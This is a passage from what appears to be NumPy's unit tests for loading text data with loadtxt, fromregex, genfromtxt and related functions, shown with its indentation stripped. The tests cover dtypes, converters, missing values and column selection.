c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C': lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = TextIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
